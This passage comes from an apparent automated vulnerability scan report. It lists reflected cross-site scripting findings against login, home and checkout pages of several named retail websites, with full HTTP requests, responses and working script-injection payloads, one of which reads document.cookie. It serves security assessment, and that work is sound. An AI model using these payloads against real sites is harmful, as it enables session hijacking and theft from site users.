Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; NewRegistrant=Global Header Log In|Create an Account; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305542003667&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D22; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:58:43 GMT
Connection: close
Set-Cookie: SSLC=web%2D06;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:58:43 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:58:43 GMT;path=/
Content-Length: 3661


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
</script>526f0"><script>alert(1)</script>8748cce5433" VALUE="">
...[SNIP]...

5.60. http://www.footlocker.com/login/login_form.cfm [bv_AA_enabled parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /login/login_form.cfm

Issue detail

The value of the bv_AA_enabled request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6784e"style%3d"x%3aexpression(alert(1))"6c3e0589f71 was submitted in the bv_AA_enabled parameter. This input was echoed as 6784e"style="x:expression(alert(1))"6c3e0589f71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /login/login_form.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=true6784e"style%3d"x%3aexpression(alert(1))"6c3e0589f71&dontRunBV=true HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:37 GMT
Connection: close
Set-Cookie: SSLC=web%2D15;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:37 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:37 GMT;path=/
Content-Length: 3321


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<form action="https://www.footlocker.com/login/login_action.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=true6784e"style="x:expression(alert(1))"6c3e0589f71" method="post" target="_self">
...[SNIP]...

5.61. http://www.footlocker.com/login/login_form.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /login/login_form.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc4cf"><script>alert(1)</script>a937fb8d7fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login/login_form.cfm?cc4cf"><script>alert(1)</script>a937fb8d7fa=1 HTTP/1.1
Host: www.footlocker.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:57:51 GMT
Connection: close
Set-Cookie: SSLC=web%2D22;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kvNzcq7EhhaxwicsoNK5tEHcjE3%0AYFDrCAOfSiDaoXvuilQ%2FxCMBrPOPNx8buPyL9lx0NzqsjNz0q4kL6gSipJbM8SiVTyaUlrgEsJFe%0AR0Pt4%2BMEOSoTJQWYIpa4nKSm4viwlCWT1JV2V7KDGygnmWiNg1zAOCJfoc2GfIzeW5%2FeSK5uXUOS%0AKuE8UK42iD0wQl31wi0YADO2S9yjp8izb9ei;expires=Wed, 08-May-2041 10:57:51 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQqXKf%2FLacY0A0lvf86Z45bfsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: NST=2011%2D05%2D16%2005%3A57%3A51;path=/
Set-Cookie: TID=5555%2D51161105572151050592439%2D0;expires=Sun, 14-Aug-2011 10:57:51 GMT;path=/
Set-Cookie: TRACK_USER_P=73934511611055751050537879;expires=Wed, 08-May-2041 10:57:51 GMT;path=/
Set-Cookie: DOTOMI_SESSION=1;path=/
Set-Cookie: CHOSEN_BANNER=2;expires=Wed, 08-May-2041 10:57:51 GMT;path=/
Content-Length: 3665


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<INPUT TYPE="hidden" name="cc4cf"><script>alert(1)</script>a937fb8d7fa" VALUE="1">
...[SNIP]...

5.62. http://www.gnc.com/community/index.jsp%20%20 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gnc.com
Path:   /community/index.jsp%20%20

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a33e7--><script>alert(1)</script>7d4814ce5e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /community/index.jsp%20%20?a33e7--><script>alert(1)</script>7d4814ce5e6=1 HTTP/1.1
Host: www.gnc.com
Proxy-Connection: keep-alive
Referer: http://app.gnc.com/profile/profile.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2SCdNQBJtc6fnMp5nXRqNrr7VfPTcdnTdWsT6PPzqzhjv122c27G!1431589390; browser_id=125602265854; __g_c=w%3A0; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; recommendationUid=801458892474636324; __utmz=1.1305510217.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.1817838745.1305510198897; PrefID=41-1015464695; __utma=1.718486850.1305510217.1305510217.1305510217.1; __utmc=1; s_pers=%20s_nr%3D1305511477578%7C1308103477578%3B%20s_lastvisit%3D1305540969641%7C1400148969641%3B%20gpv_p6%3DMy%2520Account%253A%2520Sign-In%7C1305542769642%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicgncf%253D%252526pid%25253DMy%25252520Account%2525253A%25252520Sign-In%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//app.gnc.com/profile/profile.cfm%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 10:19:06 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=rHr7NQ6hxmbbQy3CRHv3dWTTBj0czv8myJPZNQ3PhPpJhckzF2jj!-1853905486; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 80212


                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtm
...[SNIP]...
<!-- === Request Query String: a33e7--><script>alert(1)</script>7d4814ce5e6=1 -->
...[SNIP]...

5.63. http://www.gnc.com/home/index.jsp [c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gnc.com
Path:   /home/index.jsp

Issue detail

The value of the c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91 request parameter is copied into an HTML comment. The payload 5f6c9--><script>alert(1)</script>7b7524930d was submitted in the c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /home/index.jsp?c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91=15f6c9--><script>alert(1)</script>7b7524930d HTTP/1.1
Host: www.gnc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: JSESSIONID=p2GCNRCTz3d1h2C5cBh1h4qPJL2n70PJ4F6vnvf26JpKDT2qs10P!672921789; __g_c=w%3A0; mt.v=1.1133488502.1305543174179; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_lastvisit%3D1305543175233%7C1400151175233%3B%20s_nr%3D1305543402575%7C1308135402575%3B%20gpv_p6%3DHome%2520Page%7C1305545202577%3B; PrefID=32-982599681; s_vi=[CS]v1|26E881040514A1E8-60000163401B15C0[CE]; __utma=1.1693801748.1305543186.1305543186.1305543186.1; __utmb=1.3.10.1305543186; __utmc=1; __utmz=1.1305543186.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:57:42 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:43 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:43 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:43 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:43 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:43 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:43 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 115314


                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3
...[SNIP]...
<!-- === Request Query String: c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91=15f6c9--><script>alert(1)</script>7b7524930d -->
...[SNIP]...

5.64. http://www.gnc.com/home/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gnc.com
Path:   /home/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c5205--><script>alert(1)</script>bb446d17c91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /home/index.jsp?c5205--><script>alert(1)</script>bb446d17c91=1 HTTP/1.1
Host: www.gnc.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2SCdNQBJtc6fnMp5nXRqNrr7VfPTcdnTdWsT6PPzqzhjv122c27G!1431589390; browser_id=125602265854; __g_c=w%3A0; mt.v=1.1817838745.1305510198897; s_pers=%20s_nr%3D1305510199864%7C1308102199864%3B%20s_lastvisit%3D1305510199866%7C1400118199866%3B%20gpv_p6%3DHome%2520Page%7C1305511999868%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; PrefID=41-1015464695; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; recommendationUid=801458892474636324; __utmz=1.1305510217.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.718486850.1305510217.1305510217.1305510217.1; __utmc=1; __utmb=1.1.10.1305510217

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:37 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 114340


                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3
...[SNIP]...
<!-- === Request Query String: c5205--><script>alert(1)</script>bb446d17c91=1 -->
...[SNIP]...

5.65. https://www.gnc.com/checkout/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.gnc.com
Path:   /checkout/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 212ec--><script>alert(1)</script>8e54d0e09a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /checkout/index.jsp?process=orderTrackingLogin&212ec--><script>alert(1)</script>8e54d0e09a5=1 HTTP/1.1
Host: www.gnc.com
Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2SCdNQBJtc6fnMp5nXRqNrr7VfPTcdnTdWsT6PPzqzhjv122c27G!1431589390; browser_id=125602265854; __g_c=w%3A0; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; recommendationUid=801458892474636324; __utmz=1.1305510217.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.1817838745.1305510198897; PrefID=41-1015464695; __utma=1.718486850.1305510217.1305510217.1305510217.1; __utmc=1; __utmb=1.2.10.1305510217; s_pers=%20s_lastvisit%3D1305510199866%7C1400118199866%3B%20s_nr%3D1305511419003%7C1308103419003%3B%20gpv_p6%3DHome%2520Page%7C1305513219009%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicgncf%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.gnc.com/coreg/index.jsp%2525253Fstep%2525253Dot%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:16:20 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 97847


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


           
...[SNIP]...
<!-- === Request Query String: process=orderTrackingLogin&212ec--><script>alert(1)</script>8e54d0e09a5=1 -->
...[SNIP]...

5.66. http://www.petsmart.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.petsmart.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5f832--><script>alert(1)</script>3105c4c3d6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?5f832--><script>alert(1)</script>3105c4c3d6e=1 HTTP/1.1
Host: www.petsmart.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=yYyYNQQfpxN12n6YXhzXGV2xP1vJDfygpGLyGrCyZRxwh4NLZ5r0!574538188; browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; __utmz=113636102.1305509971.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113636102.773639997.1305509971.1305509971.1305509971.1; __utmc=113636102; __utmb=113636102.1.10.1305509971; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305509972462%7C1308101972462%3B%20s_lastvisit%3D1305509972464%7C1400117972464%3B%20gpv_p27%3DHome%2520Page%7C1305511772467%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; __g_c=w%3A1%7Cb%3A2%7Cr%3A%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:28 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 66802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview T
...[SNIP]...
<!-- === Request Query String: isInSecureMode=false&pageType=home&5f832--><script>alert(1)</script>3105c4c3d6e=1 -->
...[SNIP]...

5.67. http://www.petsmart.com/ [rdir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.petsmart.com
Path:   /

Issue detail

The value of the rdir request parameter is copied into an HTML comment. The payload 25e8c--><script>alert(1)</script>dc42a180bb was submitted in the rdir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?rdir=1A25e8c--><script>alert(1)</script>dc42a180bb HTTP/1.1
Host: www.petsmart.com
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
